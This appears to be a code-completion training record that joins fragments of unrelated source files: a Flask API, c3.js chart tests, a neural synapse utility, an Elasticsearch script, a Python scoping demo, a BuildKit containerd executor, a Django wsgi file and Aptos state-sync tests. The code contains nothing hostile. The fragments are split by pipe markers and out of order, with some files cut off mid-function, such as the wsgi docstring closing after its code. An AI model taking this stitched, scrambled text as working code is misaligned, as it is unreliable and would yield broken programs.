for user in users_snake_case:
add_msg = queue_client.add_create_user_job(user)
users_added.append(add_msg)
return jsonify(users_added), 200
@users_api.route('users/<int:id>', methods=['GET'])
@response(UserResponseSchema, HTTPStatus.OK.value, "Get Users")
def get_all_users(id: int):
if request.method == 'GET':
user = UserDto(user_name=DefaultConfig.DEFAULT_USERNAME)
return ToPascalJson.serialize(user), 200
| post_many |
api.data-spec.ts | import { d3, initChart } from './c3-helper'
describe('c3 api data', function() {
'use strict'
var chart
var args: any = {
data: {
columns: [
['data1', 30, 200, 100, 400, 150, 250],
['data2', 5000, 2000, 1000, 4000, 1500, 2500]
],
names: {
data1: 'Data Name 1',
data2: 'Data Name 2'
},
colors: {
data1: '#FF0000',
data2: '#00FF00'
},
axes: {
data1: 'y',
data2: 'y2'
}
},
axis: {
y2: {
show: true
}
}
}
beforeEach(function(done) {
jasmine.addMatchers(customMatchers as any)
chart = initChart(chart, args, done)
})
describe('data()', function() {
it('should return all of data if no argument given', function() {
var results = chart.data(),
expected = ['data1', 'data2']
results.forEach(function(result, i) {
expect(result.id).toBe(expected[i])
})
})
it('should return specified data if string argument given', function() {
var results = chart.data('data1')
expect(results.length).toBe(1)
expect(results[0].id).toBe('data1')
})
it('should return specified data if array argument given', function() {
var results = chart.data(['data1', 'data2'])
expect(results.length).toBe(2)
expect(results[0].id).toBe('data1')
expect(results[1].id).toBe('data2')
})
})
describe('data.shown()', function() {
it('should return only shown targets', function() {
var results
chart.hide('data1')
results = chart.data.shown()
expect(results.length).toBe(1)
expect(results[0].id).toBe('data2')
})
})
describe('data.values()', function() {
it('should return values for specified target', function() {
var values = chart.data.values('data1'),
expectedValues = [30, 200, 100, 400, 150, 250]
expect(values.length).toBe(6)
values.forEach(function(v, i) {
expect(v).toBe(expectedValues[i])
})
})
it('should return null when no args', function() {
var values = chart.data.values()
expect(values).toBeNull() | })
})
describe('data.names()', function() {
it('should return data.names specified as argument', function() {
var results = chart.data.names()
expect(results.data1).toBe('Data Name 1')
expect(results.data2).toBe('Data Name 2')
})
it('should return data.names specified as api', function() {
var results = chart.data.names({
data1: 'New Data Name 1',
data2: 'New Data Name 2'
})
expect(results.data1).toBe('New Data Name 1')
expect(results.data2).toBe('New Data Name 2')
})
it('should set data.names specified as api', function() {
expect(d3.select('.c3-legend-item-data1 text').text()).toBe(
'New Data Name 1'
)
expect(d3.select('.c3-legend-item-data2 text').text()).toBe(
'New Data Name 2'
)
})
})
describe('data.colors()', function() {
it('should return data.colors specified as argument', function() {
var results = chart.data.colors()
;(expect(results.data1) as any).toBeHexOrRGB('#FF0000')
;(expect(results.data2) as any).toBeHexOrRGB('#00FF00')
})
it('should return data.colors specified as api', function() {
var results = chart.data.colors({
data1: '#00FF00',
data2: '#FF0000'
})
;(expect(results.data1) as any).toBeHexOrRGB('#00FF00')
;(expect(results.data2) as any).toBeHexOrRGB('#FF0000')
})
it('should set data.colors specified as api', function() {
;(expect(
d3.select('.c3-line-data1').style('stroke')
) as any).toBeHexOrRGB('#00ff00')
;(expect(
d3.select('.c3-line-data2').style('stroke')
) as any).toBeHexOrRGB('#ff0000')
;(expect(
d3.select('.c3-legend-item-data1 .c3-legend-item-tile').style('stroke')
) as any).toBeHexOrRGB('#00ff00')
;(expect(
d3.select('.c3-legend-item-data2 .c3-legend-item-tile').style('stroke')
) as any).toBeHexOrRGB('#ff0000')
})
})
describe('data.axes()', function() {
it('should return data.axes specified as argument', function() {
var results = chart.data.axes()
expect(results.data1).toBe('y')
expect(results.data2).toBe('y2')
expect(d3.select('.c3-axis-y g.tick text').text()).toBe('0')
expect(d3.select('.c3-axis-y2 g.tick text').text()).toBe('1000')
})
it('should return data.axes specified as api', function() {
var results = chart.data.axes({
data1: 'y2',
data2: 'y'
})
expect(results.data1).toBe('y2')
expect(results.data2).toBe('y')
expect(d3.select('.c3-axis-y g.tick text').text()).toBe('1000')
expect(d3.select('.c3-axis-y2 g.tick text').text()).toBe('0')
})
})
describe('data.stackNormalized()', function() {
beforeEach(function(done) {
args = {
data: {
columns: [
['data1', 30, 200, 100, 400, 150, 250],
['data2', 500, 850, 1000, 200, 350, 100]
],
groups: [['data1', 'data2']],
stack: {
normalize: true
}
}
}
chart = initChart(chart, args, done)
})
it('can toggle option', function(done) {
expect(chart.data.stackNormalized()).toBe(true)
expect(chart.internal.y.domain()).toEqual([0, 100])
chart.data.stackNormalized(false)
setTimeout(function() {
expect(chart.data.stackNormalized()).toBe(false)
expect(chart.internal.y.domain()).toEqual([0, 1200])
done()
}, 100)
})
})
})
describe('c3 api data.x', function() {
'use strict'
var chart
var args = {
data: {
x: 'x',
columns: [
['x', 10, 30, 45, 50, 70, 100],
['data1', 30, 200, 100, 400, 150, 250],
['data2', 20, 180, 240, 100, 190]
]
}
}
beforeEach(function(done) {
chart = initChart(chart, args, done)
})
it('should return values for target data1', function() {
var values = chart.data.values('data1'),
expectedValues = [30, 200, 100, 400, 150, 250]
expect(values.length).toBe(6)
values.forEach(function(v, i) {
expect(v).toBe(expectedValues[i])
})
})
it('should return null when no args', function() {
var values = chart.data.values()
expect(values).toBeNull()
})
it('should return data values for data if string argument given', function() {
var results = chart.data('data1')
expect(results.length).toBe(1)
expect(results[0].id).toBe('data1')
})
it('should return specified data if array argument given', function() {
var results = chart.data(['data1', 'data2'])
expect(results.length).toBe(2)
expect(results[0].id).toBe('data1')
expect(results[1].id).toBe('data2')
})
})
describe('c3 api data.xs', function() {
'use strict'
var chart
var args = {
data: {
xs: {
data1: 'x1',
data2: 'x2'
},
columns: [
['x1', 10, 30, 45, 50, 70, 100],
['x2', 30, 50, 75, 100, 120],
['data1', 30, 200, 100, 400, 150, 250],
['data2', 20, 180, 240, 100, 190]
]
}
}
beforeEach(function(done) {
chart = initChart(chart, args, done)
})
it('should return values for target data1', function() {
var values = chart.data.values('data1'),
expectedValues = [30, 200, 100, 400, 150, 250]
expect(values.length).toBe(6)
values.forEach(function(v, i) {
expect(v).toBe(expectedValues[i])
})
})
it('should return null when no args', function() {
var values = chart.data.values()
expect(values).toBeNull()
})
it('should return data values for data if string argument given', function() {
var results = chart.data('data1')
expect(results.length).toBe(1)
expect(results[0].id).toBe('data1')
})
it('should return specified data if array argument given', function() {
var results = chart.data(['data1', 'data2'])
expect(results.length).toBe(2)
expect(results[0].id).toBe('data1')
expect(results[1].id).toBe('data2')
})
})
var customMatchers = {
toBeHexOrRGB: function(util, customEqualityTesters) {
'use strict'
function rgb2hex(rgb) {
rgb = rgb.match(
/^rgba?[\s+]?\([\s+]?(\d+)[\s+]?,[\s+]?(\d+)[\s+]?,[\s+]?(\d+)[\s+]?/i
)
return rgb && rgb.length === 4
? '#' +
('0' + parseInt(rgb[1], 10).toString(16)).slice(-2) +
('0' + parseInt(rgb[2], 10).toString(16)).slice(-2) +
('0' + parseInt(rgb[3], 10).toString(16)).slice(-2)
: ''
}
return {
compare: function(actual, expected) {
if (expected === undefined) {
expected = ''
}
var result: any = {}
actual = actual.match('rgb') ? rgb2hex(actual) : actual
expected = expected.match('rgb') ? rgb2hex(expected) : expected
result.pass = util.equals(actual, expected, customEqualityTesters)
if (result.pass) {
result.message = 'Expected ' + actual + ' not to be quite so goofy'
} else {
result.message =
'Expected ' + actual + ' to be goofy, but it was not very goofy'
}
return result
}
}
}
} | |
synapse_util.py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for synapse handling."""
import enum
import functools as ft
from typing import Callable, List, Sequence, Text, Union, Optional
import dataclasses as dc
import jax.numpy as jp
import numpy as np
import tensorflow.compat.v1 as tf
from blur import blur_env
TensorShape = tf.TensorShape
Tensor = Union[tf.Tensor, np.ndarray, jp.array]
@dc.dataclass
class SynapseInitializerParams:
shape: TensorShape
in_neurons: int
out_neurons: int
class UpdateType(enum.Enum):
FORWARD = 1
BACKWARD = 2
BOTH = 3
NONE = 4
SynapseInitializer = Callable[[SynapseInitializerParams], Tensor]
# A callable that takes a sequence of layers and SynapseInitializer and creates
# appropriately shaped list of Synapses.
CreateSynapseFn = Callable[[Sequence[Tensor], SynapseInitializer], List[Tensor]]
def random_uniform_symmetric(shape, seed):
return (tf.random.uniform(shape, seed=seed) - 0.5) * 2
def random_initializer(start_seed=0, scale_by_channels=False,
scale=1, bias=0, random_fn=random_uniform_symmetric):
"""Returns initializer that generates random sequence."""
seed = [hash(str(start_seed))]
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
seed[0] += 1
v = random_fn(params.shape, seed[0])
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def _random_uniform_fn(start_seed):
rng = np.random.RandomState(start_seed)
return lambda shape: tf.constant(rng.uniform( # pylint: disable=g-long-lambda
low=-1, high=1, size=shape), dtype=np.float32)
def fixed_random_initializer(start_seed=0,
scale_by_channels=False,
scale=1,
bias=0,
random_fn=None):
"""Returns an initializer that generates random (but fixed) sequence.
The resulting tensors are backed by a constant so they produce the same
value across all calls.
This initializer uses its own random state that is independent of default
random sequence.
Args:
start_seed: initial seed passed to np.random.RandomStates
scale_by_channels: whether to scale by number of channels.
scale: target scale (default: 1)
bias: mean of the resulting distribution.
random_fn: random generator if none will use use _random_uniform_fn
Returns:
callable that accepts shape and returns tensorflow constant tensor.
"""
if random_fn is None:
random_fn = _random_uniform_fn(start_seed)
def impl(params):
if len(params.shape) >= 3:
# shape: species x (in+out) x (in+out) x states
num_channels = int(params.shape[-2])
v = random_fn(shape=params.shape)
apply_scale = scale(params) if callable(scale) else scale
r = v * apply_scale + bias
if scale_by_channels:
r = r / (num_channels ** 0.5)
return r
return impl
def create_synapse_init_fns(
layers,
initializer):
"""Generates network synapse initializers.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of functions that produce synapse tensors for all layers upon
execution.
"""
synapse_init_fns = []
for pre, post in zip(layers, layers[1:]):
# shape: population_dims, batch_size, in_channels, neuron_state
pop_dims = pre.shape[:-3]
# -2: is the number of channels
num_inputs = pre.shape[-2] + post.shape[-2] + 1
# -1: is the number of states in a single neuron.
synapse_shape = (*pop_dims, num_inputs, num_inputs, pre.shape[-1])
params = SynapseInitializerParams(
shape=synapse_shape,
in_neurons=pre.shape[-2],
out_neurons=post.shape[-2])
synapse_init_fns.append(ft.partial(initializer, params))
return synapse_init_fns
def create_synapses(layers,
initializer):
"""Generates arbitrary form synapses.
Arguments:
layers: Sequence of network layers (used for shape calculation).
initializer: SynapseInitializer used to initialize synapse tensors.
Returns:
A list of created synapse tensors for all layers.
"""
return [init_fn() for init_fn in create_synapse_init_fns(layers, initializer)]
def transpose_synapse(synapse, env):
num_batch_dims = len(synapse.shape[:-3])
perm = [
*range(num_batch_dims), num_batch_dims + 1, num_batch_dims,
num_batch_dims + 2
]
return env.transpose(synapse, perm)
def synapse_submatrix(synapse,
in_channels,
update_type,
include_bias = True):
"""Returns a submatrix of a synapse matrix given the update type."""
bias = 1 if include_bias else 0
if update_type == UpdateType.FORWARD:
return synapse[Ellipsis, :(in_channels + bias), (in_channels + bias):, :]
if update_type == UpdateType.BACKWARD:
return synapse[Ellipsis, (in_channels + 1):, :(in_channels + bias), :]
def combine_in_out_synapses(in_out_synapse, out_in_synapse,
env):
"""Combines forward and backward synapses into a single matrix."""
batch_dims = in_out_synapse.shape[:-3]
out_channels, in_channels, num_states = in_out_synapse.shape[-3:]
synapse = env.concat([
env.concat([
env.zeros((*batch_dims, out_channels, out_channels, num_states)),
in_out_synapse
], axis=-2),
env.concat([
out_in_synapse,
env.zeros((*batch_dims, in_channels, in_channels, num_states))
], axis=-2)
], axis=-3)
return synapse
def sync_all_synapses(synapses, layers, env):
"""Sync synapses across all layers.
For each synapse, syncs its first state forward synapse with backward synapse
and copies it arocess all the states.
Args:
synapses: list of synapses in the network.
layers: list of layers in the network.
env: Environment
Returns:
Synchronized synapses.
"""
for i in range(len(synapses)):
synapses[i] = sync_in_and_out_synapse(synapses[i], layers[i].shape[-2], env)
return synapses
def sync_in_and_out_synapse(synapse, in_channels, env):
"""Copies forward synapse to backward one."""
in_out_synapse = synapse_submatrix(
synapse,
in_channels=in_channels,
update_type=UpdateType.FORWARD,
include_bias=True)
return combine_in_out_synapses(
in_out_synapse,
transpose_synapse(in_out_synapse, env),
env)
def sync_states_synapse(synapse, env, num_states=None):
|
def normalize_synapses(synapses,
rescale_to,
env,
axis = -3):
"""Normalizes synapses across a particular axis (across input by def.)."""
# Default value axis=-3 corresponds to normalizing across the input neuron
# dimension.
squared = env.sum(synapses ** 2, axis=axis, keepdims=True)
synapses /= env.sqrt(squared + 1e-9)
if rescale_to is not None:
synapses *= rescale_to
return synapses
| """Sync synapse's first state across all the other states."""
if num_states is None:
num_states = synapse.shape[-1]
return env.stack(num_states*[synapse[Ellipsis, 0]], axis=-1) |
search.py | from elasticsearch import Elasticsearch
from pprint import pprint as pp
es = Elasticsearch()
INDEX = "meme-index"
TYPE = "meme"
def submit(id, doc):
res = es.index(index=INDEX, doc_type=TYPE, id=id, body=doc)
if res['created']:
return True
def search(query):
es.indices.refresh(index=INDEX)
res = es.search(index=INDEX, body={
"query": {
"fuzzy_like_this": {
"fields": ["title"],
"like_text": query,
"max_query_terms": 12
}
}
})
print("Query: %s -> Got %d Hits:" % (query, res['hits']['total']))
return res['hits']['hits']
def get(id):
"""
:param id: the exact match of the id (the url)
:return: dict
"""""
return es.get(index=INDEX, doc_type=TYPE, id=id)
if __name__ == '__main__':
#es.indices.delete(index=INDEX)
#submit("http://www.google.com/", { | #res = search("how")
res = get('http://knowyourmeme.com/memes/pancake-bunny')
pp(res)
#res = search("hi") | # 'title': "hello world",
# 'body': "body ",
# 'img': 'url'
#}) |
var_global_local.py | global_var = 10
def function_example(local_var_1, local_var_2):
print(local_var_1, local_var_2, global_var)
function_example(11, 12)
def function_example_1(local_var_1, local_var_2):
global global_var
global_var = 20
print(local_var_1, local_var_2, global_var, id(global_var))
function_example_1(11, 12)
print(global_var, id(global_var))
# nonlocal
def counter():
num = 0
def plus_one():
nonlocal num
num+=1
return num
return plus_one
count = counter()
print(count) | print(count())
print(count()) | |
executor.go | package containerdexecutor
import (
"context"
"io"
"io/ioutil"
"os"
"path/filepath"
"sync"
"syscall"
"time"
"github.com/moby/buildkit/util/bklog"
"github.com/containerd/containerd"
"github.com/containerd/containerd/cio"
"github.com/containerd/containerd/mount"
containerdoci "github.com/containerd/containerd/oci"
"github.com/containerd/continuity/fs"
"github.com/docker/docker/pkg/idtools"
"github.com/moby/buildkit/executor"
"github.com/moby/buildkit/executor/oci"
gatewayapi "github.com/moby/buildkit/frontend/gateway/pb"
"github.com/moby/buildkit/identity"
"github.com/moby/buildkit/snapshot"
"github.com/moby/buildkit/solver/pb"
"github.com/moby/buildkit/util/network"
"github.com/opencontainers/runtime-spec/specs-go"
"github.com/pkg/errors"
)
type containerdExecutor struct {
client *containerd.Client
root string
networkProviders map[pb.NetMode]network.Provider
cgroupParent string
dnsConfig *oci.DNSConfig
running map[string]chan error
mu sync.Mutex
apparmorProfile string
traceSocket string
}
// New creates a new executor backed by connection to containerd API
func New(client *containerd.Client, root, cgroup string, networkProviders map[pb.NetMode]network.Provider, dnsConfig *oci.DNSConfig, apparmorProfile string, traceSocket string) executor.Executor { | // clean up old hosts/resolv.conf file. ignore errors
os.RemoveAll(filepath.Join(root, "hosts"))
os.RemoveAll(filepath.Join(root, "resolv.conf"))
return &containerdExecutor{
client: client,
root: root,
networkProviders: networkProviders,
cgroupParent: cgroup,
dnsConfig: dnsConfig,
running: make(map[string]chan error),
apparmorProfile: apparmorProfile,
traceSocket: traceSocket,
}
}
func (w *containerdExecutor) Run(ctx context.Context, id string, root executor.Mount, mounts []executor.Mount, process executor.ProcessInfo, started chan<- struct{}) (err error) {
if id == "" {
id = identity.NewID()
}
startedOnce := sync.Once{}
done := make(chan error, 1)
w.mu.Lock()
w.running[id] = done
w.mu.Unlock()
defer func() {
w.mu.Lock()
delete(w.running, id)
w.mu.Unlock()
done <- err
close(done)
if started != nil {
startedOnce.Do(func() {
close(started)
})
}
}()
meta := process.Meta
resolvConf, err := oci.GetResolvConf(ctx, w.root, nil, w.dnsConfig)
if err != nil {
return err
}
hostsFile, clean, err := oci.GetHostsFile(ctx, w.root, meta.ExtraHosts, nil, meta.Hostname)
if err != nil {
return err
}
if clean != nil {
defer clean()
}
mountable, err := root.Src.Mount(ctx, false)
if err != nil {
return err
}
rootMounts, release, err := mountable.Mount()
if err != nil {
return err
}
if release != nil {
defer release()
}
lm := snapshot.LocalMounterWithMounts(rootMounts)
rootfsPath, err := lm.Mount()
if err != nil {
return err
}
defer lm.Unmount()
defer executor.MountStubsCleaner(rootfsPath, mounts)()
var sgids []uint32
uid, gid, err := oci.ParseUIDGID(meta.User)
if err != nil {
uid, gid, sgids, err = oci.GetUser(rootfsPath, meta.User)
if err != nil {
return err
}
identity := idtools.Identity{
UID: int(uid),
GID: int(gid),
}
newp, err := fs.RootPath(rootfsPath, meta.Cwd)
if err != nil {
return errors.Wrapf(err, "working dir %s points to invalid target", newp)
}
if _, err := os.Stat(newp); err != nil {
if err := idtools.MkdirAllAndChown(newp, 0755, identity); err != nil {
return errors.Wrapf(err, "failed to create working directory %s", newp)
}
}
}
provider, ok := w.networkProviders[meta.NetMode]
if !ok {
return errors.Errorf("unknown network mode %s", meta.NetMode)
}
namespace, err := provider.New()
if err != nil {
return err
}
defer namespace.Close()
if meta.NetMode == pb.NetMode_HOST {
bklog.G(ctx).Info("enabling HostNetworking")
}
opts := []containerdoci.SpecOpts{oci.WithUIDGID(uid, gid, sgids)}
if meta.ReadonlyRootFS {
opts = append(opts, containerdoci.WithRootFSReadonly())
}
processMode := oci.ProcessSandbox // FIXME(AkihiroSuda)
spec, cleanup, err := oci.GenerateSpec(ctx, meta, mounts, id, resolvConf, hostsFile, namespace, w.cgroupParent, processMode, nil, w.apparmorProfile, w.traceSocket, opts...)
if err != nil {
return err
}
defer cleanup()
spec.Process.Terminal = meta.Tty
container, err := w.client.NewContainer(ctx, id,
containerd.WithSpec(spec),
)
if err != nil {
return err
}
defer func() {
if err1 := container.Delete(context.TODO()); err == nil && err1 != nil {
err = errors.Wrapf(err1, "failed to delete container %s", id)
}
}()
fixProcessOutput(&process)
cioOpts := []cio.Opt{cio.WithStreams(process.Stdin, process.Stdout, process.Stderr)}
if meta.Tty {
cioOpts = append(cioOpts, cio.WithTerminal)
}
task, err := container.NewTask(ctx, cio.NewCreator(cioOpts...), containerd.WithRootFS([]mount.Mount{{
Source: rootfsPath,
Type: "bind",
Options: []string{"rbind"},
}}))
if err != nil {
return err
}
defer func() {
if _, err1 := task.Delete(context.TODO()); err == nil && err1 != nil {
err = errors.Wrapf(err1, "failed to delete task %s", id)
}
}()
err = w.runProcess(ctx, task, process.Resize, func() {
startedOnce.Do(func() {
if started != nil {
close(started)
}
})
})
return err
}
func (w *containerdExecutor) Exec(ctx context.Context, id string, process executor.ProcessInfo) (err error) {
meta := process.Meta
// first verify the container is running, if we get an error assume the container
// is in the process of being created and check again every 100ms or until
// context is canceled.
var container containerd.Container
var task containerd.Task
for {
w.mu.Lock()
done, ok := w.running[id]
w.mu.Unlock()
if !ok {
return errors.Errorf("container %s not found", id)
}
if container == nil {
container, _ = w.client.LoadContainer(ctx, id)
}
if container != nil && task == nil {
task, _ = container.Task(ctx, nil)
}
if task != nil {
status, _ := task.Status(ctx)
if status.Status == containerd.Running {
break
}
}
select {
case <-ctx.Done():
return ctx.Err()
case err, ok := <-done:
if !ok || err == nil {
return errors.Errorf("container %s has stopped", id)
}
return errors.Wrapf(err, "container %s has exited with error", id)
case <-time.After(100 * time.Millisecond):
continue
}
}
spec, err := container.Spec(ctx)
if err != nil {
return errors.WithStack(err)
}
proc := spec.Process
// TODO how do we get rootfsPath for oci.GetUser in case user passed in username rather than uid:gid?
// For now only support uid:gid
if meta.User != "" {
uid, gid, err := oci.ParseUIDGID(meta.User)
if err != nil {
return errors.WithStack(err)
}
proc.User = specs.User{
UID: uid,
GID: gid,
AdditionalGids: []uint32{},
}
}
proc.Terminal = meta.Tty
proc.Args = meta.Args
if meta.Cwd != "" {
spec.Process.Cwd = meta.Cwd
}
if len(process.Meta.Env) > 0 {
spec.Process.Env = process.Meta.Env
}
fixProcessOutput(&process)
cioOpts := []cio.Opt{cio.WithStreams(process.Stdin, process.Stdout, process.Stderr)}
if meta.Tty {
cioOpts = append(cioOpts, cio.WithTerminal)
}
taskProcess, err := task.Exec(ctx, identity.NewID(), proc, cio.NewCreator(cioOpts...))
if err != nil {
return errors.WithStack(err)
}
err = w.runProcess(ctx, taskProcess, process.Resize, nil)
return err
}
func fixProcessOutput(process *executor.ProcessInfo) {
// It seems like if containerd has one of stdin, stdout or stderr then the
// others need to be present as well otherwise we get this error:
// failed to start io pipe copy: unable to copy pipes: containerd-shim: opening file "" failed: open : no such file or directory: unknown
// So just stub out any missing output
if process.Stdout == nil {
process.Stdout = &nopCloser{ioutil.Discard}
}
if process.Stderr == nil {
process.Stderr = &nopCloser{ioutil.Discard}
}
}
func (w *containerdExecutor) runProcess(ctx context.Context, p containerd.Process, resize <-chan executor.WinSize, started func()) error {
// Not using `ctx` here because the context passed only affects the statusCh which we
// don't want cancelled when ctx.Done is sent. We want to process statusCh on cancel.
statusCh, err := p.Wait(context.Background())
if err != nil {
return err
}
io := p.IO()
defer func() {
io.Wait()
io.Close()
}()
err = p.Start(ctx)
if err != nil {
return err
}
if started != nil {
started()
}
p.CloseIO(ctx, containerd.WithStdinCloser)
// resize in separate go loop so it does not potentially block
// the container cancel/exit status loop below.
resizeCtx, resizeCancel := context.WithCancel(ctx)
defer resizeCancel()
go func() {
for {
select {
case <-resizeCtx.Done():
return
case size, ok := <-resize:
if !ok {
return // chan closed
}
err = p.Resize(resizeCtx, size.Cols, size.Rows)
if err != nil {
bklog.G(resizeCtx).Warnf("Failed to resize %s: %s", p.ID(), err)
}
}
}
}()
var cancel func()
var killCtxDone <-chan struct{}
ctxDone := ctx.Done()
for {
select {
case <-ctxDone:
ctxDone = nil
var killCtx context.Context
killCtx, cancel = context.WithTimeout(context.Background(), 10*time.Second)
killCtxDone = killCtx.Done()
p.Kill(killCtx, syscall.SIGKILL)
io.Cancel()
case status := <-statusCh:
if cancel != nil {
cancel()
}
if status.ExitCode() != 0 {
exitErr := &gatewayapi.ExitError{
ExitCode: status.ExitCode(),
Err: status.Error(),
}
if status.ExitCode() == gatewayapi.UnknownExitStatus && status.Error() != nil {
exitErr.Err = errors.Wrap(status.Error(), "failure waiting for process")
}
select {
case <-ctx.Done():
exitErr.Err = errors.Wrap(ctx.Err(), exitErr.Error())
default:
}
return exitErr
}
return nil
case <-killCtxDone:
if cancel != nil {
cancel()
}
io.Cancel()
return errors.Errorf("failed to kill process on cancel")
}
}
}
type nopCloser struct {
io.Writer
}
func (c *nopCloser) Close() error {
return nil
} | |
wsgi.py | """
WSGI config for maillerApp project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ | from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'maillerApp.settings')
application = get_wsgi_application() | """
import os
|
driver.rs | // Copyright (c) Aptos
// SPDX-License-Identifier: Apache-2.0
use crate::{
driver_factory::DriverFactory,
tests::utils::{
create_event, create_ledger_info_at_version, create_transaction,
verify_mempool_and_event_notification,
},
};
use aptos_config::config::{NodeConfig, RoleType};
use aptos_data_client::aptosnet::AptosNetDataClient;
use aptos_infallible::RwLock;
use aptos_time_service::TimeService;
use aptos_types::{
event::EventKey,
move_resource::MoveStorage,
on_chain_config::{new_epoch_event_key, ON_CHAIN_CONFIG_REGISTRY},
transaction::{Transaction, WriteSetPayload},
waypoint::Waypoint,
};
use aptos_vm::AptosVM;
use aptosdb::AptosDB;
use claim::{assert_err, assert_none};
use consensus_notifications::{ConsensusNotificationSender, ConsensusNotifier};
use data_streaming_service::streaming_client::new_streaming_service_client_listener_pair;
use event_notifications::{
EventNotificationListener, EventNotificationSender, EventSubscriptionService,
ReconfigNotificationListener,
};
use executor::chunk_executor::ChunkExecutor;
use executor_test_helpers::bootstrap_genesis;
use futures::{FutureExt, StreamExt};
use mempool_notifications::MempoolNotificationListener;
use network::application::{interface::MultiNetworkSender, storage::PeerMetadataStorage};
use std::{collections::HashMap, sync::Arc};
use storage_interface::{DbReader, DbReaderWriter};
use storage_service_client::StorageServiceClient;
// TODO(joshlind): extend these tests to cover more functionality!
#[tokio::test(flavor = "multi_thread")]
async fn test_auto_bootstrapping() {
// Create a driver for a validator with a waypoint at version 0
let (validator_driver, _, _, _, _) = create_validator_driver(None).await;
// Wait until the validator is bootstrapped (auto-bootstrapping should occur)
let driver_client = validator_driver.create_driver_client();
driver_client.notify_once_bootstrapped().await.unwrap();
}
#[tokio::test]
async fn test_consensus_commit_notification() {
// Create a driver for a full node
let (_full_node_driver, consensus_notifier, _, _, _) = create_full_node_driver(None).await;
// Verify that full nodes can't process commit notifications
let result = consensus_notifier
.notify_new_commit(vec![create_transaction()], vec![])
.await;
assert_err!(result);
// Create a driver for a validator with a waypoint at version 0
let (_validator_driver, consensus_notifier, _, _, _) = create_validator_driver(None).await;
// Send a new commit notification and verify the node isn't bootstrapped
let result = consensus_notifier
.notify_new_commit(vec![create_transaction()], vec![])
.await;
assert_err!(result);
}
#[tokio::test]
async fn test_mempool_commit_notifications() {
// Create a driver for a validator with a waypoint at version 0
let subscription_event_key = EventKey::random();
let (validator_driver, consensus_notifier, mut mempool_listener, _, mut event_listener) =
create_validator_driver(Some(vec![subscription_event_key])).await;
// Wait until the validator is bootstrapped
let driver_client = validator_driver.create_driver_client();
driver_client.notify_once_bootstrapped().await.unwrap();
// Create commit data for testing
let transactions = vec![create_transaction(), create_transaction()];
let events = vec![
create_event(Some(subscription_event_key)),
create_event(Some(subscription_event_key)),
];
// Send a new consensus commit notification to the driver
let committed_transactions = transactions.clone();
let committed_events = events.clone();
let join_handle = tokio::spawn(async move {
consensus_notifier
.notify_new_commit(committed_transactions, committed_events)
.await
.unwrap();
});
// Verify mempool is notified and that the event listener is notified
verify_mempool_and_event_notification(
Some(&mut event_listener),
&mut mempool_listener,
transactions,
events,
)
.await;
// Ensure the consensus notification is acknowledged
join_handle.await.unwrap();
}
#[tokio::test]
async fn test_reconfiguration_notifications() {
// Create a driver for a validator with a waypoint at version 0
let (validator_driver, consensus_notifier, mut mempool_listener, mut reconfig_listener, _) =
create_validator_driver(None).await;
// Wait until the validator is bootstrapped
let driver_client = validator_driver.create_driver_client();
driver_client.notify_once_bootstrapped().await.unwrap();
// Test different events
let reconfiguration_event = new_epoch_event_key();
for event_key in [
EventKey::random(),
reconfiguration_event,
EventKey::random(),
reconfiguration_event,
] {
// Create commit data for testing
let transactions = vec![create_transaction(), create_transaction()];
let events = vec![create_event(Some(event_key))];
// Send a new consensus commit notification to the driver
let committed_transactions = transactions.clone();
let committed_events = events.clone();
let consensus_notifier = consensus_notifier.clone();
let join_handle = tokio::spawn(async move {
consensus_notifier
.notify_new_commit(committed_transactions, committed_events)
.await
.unwrap();
});
// Verify mempool is notified
verify_mempool_and_event_notification(None, &mut mempool_listener, transactions, events)
.await;
// Verify the reconfiguration listener is notified if a reconfiguration occurred
if event_key == reconfiguration_event {
let reconfig_notification = reconfig_listener.select_next_some().await;
assert_eq!(reconfig_notification.version, 0);
} else {
assert_none!(reconfig_listener.select_next_some().now_or_never());
}
// Ensure the consensus notification is acknowledged
join_handle.await.unwrap();
}
}
#[tokio::test]
async fn test_consensus_sync_request() {
// Create a driver for a full node
let (_full_node_driver, consensus_notifier, _, _, _) = create_full_node_driver(None).await;
// Verify that full nodes can't process sync requests
let result = consensus_notifier
.sync_to_target(create_ledger_info_at_version(0))
.await;
assert_err!(result);
// Create a driver for a validator with a waypoint at version 0
let (_validator_driver, consensus_notifier, _, _, _) = create_validator_driver(None).await;
// Send a new sync request and verify the node isn't bootstrapped
let result = consensus_notifier
.sync_to_target(create_ledger_info_at_version(0))
.await;
assert_err!(result);
}
/// Creates a state sync driver for a validator node
async fn create_validator_driver(
event_key_subscriptions: Option<Vec<EventKey>>,
) -> (
DriverFactory,
ConsensusNotifier,
MempoolNotificationListener,
ReconfigNotificationListener,
EventNotificationListener, |
create_driver_for_tests(node_config, Waypoint::default(), event_key_subscriptions).await
}
/// Creates a state sync driver for a full node
async fn create_full_node_driver(
event_key_subscriptions: Option<Vec<EventKey>>,
) -> (
DriverFactory,
ConsensusNotifier,
MempoolNotificationListener,
ReconfigNotificationListener,
EventNotificationListener,
) {
let mut node_config = NodeConfig::default();
node_config.base.role = RoleType::FullNode;
create_driver_for_tests(node_config, Waypoint::default(), event_key_subscriptions).await
}
/// Creates a state sync driver using the given node config and waypoint
async fn create_driver_for_tests(
node_config: NodeConfig,
waypoint: Waypoint,
event_key_subscriptions: Option<Vec<EventKey>>,
) -> (
DriverFactory,
ConsensusNotifier,
MempoolNotificationListener,
ReconfigNotificationListener,
EventNotificationListener,
) {
// Create test aptos database
let db_path = aptos_temppath::TempPath::new();
db_path.create_as_dir().unwrap();
